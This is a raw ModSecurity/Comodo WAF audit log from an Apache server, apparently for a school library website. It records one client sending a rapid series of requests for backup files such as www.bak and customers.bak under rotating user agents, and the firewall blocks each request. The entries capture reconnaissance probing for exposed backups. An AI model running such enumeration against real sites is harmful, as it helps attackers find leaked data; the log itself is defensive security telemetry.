[line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200702356 2519 (- - -) Stopwatch2: 1747683200702356 2519; combined=1062, p1=512, p2=522, p3=0, p4=0, p5=28, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49366863-Z-- --2fb8517f-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEhAAAAMM 103.236.140.4 58882 103.236.140.4 8181 --2fb8517f-B-- GET /archive.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1; rv:52.8.0) Gecko/20100101 Firefox/52.8.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 87334849 --2fb8517f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2fb8517f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200702471 2685 (- - -) Stopwatch2: 1747683200702471 2685; combined=879, p1=297, p2=555, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fb8517f-Z-- --4692140d-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEkAAAANY 103.236.140.4 58882 103.236.140.4 8181 --4692140d-B-- GET /php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161710101 --4692140d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4692140d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200710135 2561 (- - -) Stopwatch2: 1747683200710135 2561; combined=693, p1=347, p2=311, p3=0, p4=0, p5=34, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4692140d-Z-- --06cca272-A-- [20/May/2025:02:33:20 +0700] aCuHgAZaP57SewDBUi9nZwAAAE4 103.236.140.4 59438 103.236.140.4 8181 --06cca272-B-- GET /wwwroot.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161153033 --06cca272-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --06cca272-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200712930 2419 (- - -) Stopwatch2: 1747683200712930 2419; combined=822, p1=359, p2=396, p3=0, p4=0, p5=66, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06cca272-Z-- --9804a842-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOElwAAAMM 103.236.140.4 58986 103.236.140.4 8181 --9804a842-B-- GET /files.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3; rv:52.4.1) Gecko/20100101 Firefox/52.4.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152797226 --9804a842-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9804a842-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200714155 1898 (- - -) Stopwatch2: 1747683200714155 1898; combined=692, p1=364, p2=301, p3=0, p4=0, p5=26, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9804a842-Z-- --d600f872-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5-7AAAAJY 103.236.140.4 59088 103.236.140.4 8181 --d600f872-B-- GET /store.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0.1) Gecko/20100101 Firefox/52.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 149913630 --d600f872-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d600f872-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200714136 6832 (- - -) Stopwatch2: 1747683200714136 6832; combined=762, p1=356, p2=374, p3=0, p4=0, p5=31, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d600f872-Z-- --e2d43870-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5-5gAAAIU 103.236.140.4 59478 103.236.140.4 8181 --e2d43870-B-- GET /web.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.1805 Safari/537.36 OPR/54.0.2952.51 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 148936201 --e2d43870-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e2d43870-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200716351 5619 (- - -) Stopwatch2: 1747683200716351 5619; combined=2592, p1=576, p2=1984, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2d43870-Z-- --54a6ae75-A-- [20/May/2025:02:33:20 +0700] aCuHgDuVdcwZ_qZ5ZIonQQAAABQ 103.236.140.4 58856 103.236.140.4 8181 --54a6ae75-B-- GET /new.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 143614018 --54a6ae75-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --54a6ae75-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200721030 1967 (- - -) Stopwatch2: 1747683200721030 1967; combined=726, p1=386, p2=317, p3=0, p4=0, p5=23, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54a6ae75-Z-- --1117220b-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEmwAAANU 103.236.140.4 59174 103.236.140.4 8181 --1117220b-B-- GET /back.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159350802 --1117220b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1117220b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200721449 1790 (- - -) Stopwatch2: 1747683200721449 1790; combined=670, p1=352, p2=294, p3=0, p4=0, p5=24, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1117220b-Z-- --5e048505-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEmQAAANc 103.236.140.4 58982 103.236.140.4 8181 --5e048505-B-- GET /com.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 OPR/60.0.3255.170 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161775637 --5e048505-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5e048505-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200721228 5021 (- - -) Stopwatch2: 1747683200721228 5021; combined=790, p1=392, p2=368, p3=0, p4=0, p5=30, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e048505-Z-- --f8154b17-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5-4wAAAIg 103.236.140.4 59064 103.236.140.4 8181 --f8154b17-B-- GET /www.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153681935 --f8154b17-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f8154b17-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200714732 12676 (- - -) Stopwatch2: 1747683200714732 12676; combined=621, p1=290, p2=302, p3=0, p4=0, p5=28, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8154b17-Z-- --32212a20-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5-7wAAAIA 103.236.140.4 59144 103.236.140.4 8181 --32212a20-B-- GET /erpustakaan_smkn22jakarta_sch_id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164142304 --32212a20-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --32212a20-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200703157 24661 (- - -) Stopwatch2: 1747683200703157 24661; combined=668, p1=333, p2=302, p3=0, p4=0, p5=32, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32212a20-Z-- --13f51d16-A-- [20/May/2025:02:33:20 +0700] aCuHgDuVdcwZ_qZ5ZIonTAAAAAk 103.236.140.4 59702 103.236.140.4 8181 --13f51d16-B-- GET /customers.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686; rv:66.0.3) Gecko/20100101 Firefox/66.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127580981 --13f51d16-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --13f51d16-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200724811 8805 (- - -) Stopwatch2: 1747683200724811 8805; combined=673, p1=329, p2=304, p3=0, p4=0, p5=39, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13f51d16-Z-- --be216b77-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5_CwAAAIo 103.236.140.4 59842 103.236.140.4 8181 --be216b77-B-- GET /engine.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165740547 --be216b77-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --be216b77-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200733852 1915 (- - -) Stopwatch2: 1747683200733852 1915; combined=714, p1=366, p2=315, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be216b77-Z-- --843a7e47-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEowAAANE 103.236.140.4 59764 103.236.140.4 8181 --843a7e47-B-- GET /2013.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:62.0.3) Gecko/20100101 Firefox/62.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 163348486 --843a7e47-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --843a7e47-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200727212 9126 (- - -) Stopwatch2: 1747683200727212 9126; combined=639, p1=319, p2=286, p3=0, p4=0, p5=33, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --843a7e47-Z-- --09c20a74-A-- [20/May/2025:02:33:20 +0700] aCuHgDuVdcwZ_qZ5ZIonTQAAABI 103.236.140.4 59712 103.236.140.4 8181 --09c20a74-B-- GET /erpustakaansmkn22jakartaschid.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.8.1) Gecko/20100101 Firefox/52.8.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 100177664 --09c20a74-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --09c20a74-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200724907 12256 (- - -) Stopwatch2: 1747683200724907 12256; combined=661, p1=318, p2=311, p3=0, p4=0, p5=32, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09c20a74-Z-- --c07c530b-A-- [20/May/2025:02:33:20 +0700] aCuHgDuVdcwZ_qZ5ZIonXQAAABA 103.236.140.4 59718 103.236.140.4 8181 --c07c530b-B-- GET /bak.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809 Safari/537.36 OPR/58.0.3135.107 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 93032131 --c07c530b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c07c530b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200739910 1653 (- - -) Stopwatch2: 1747683200739910 1653; combined=581, p1=272, p2=285, p3=0, p4=0, p5=23, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
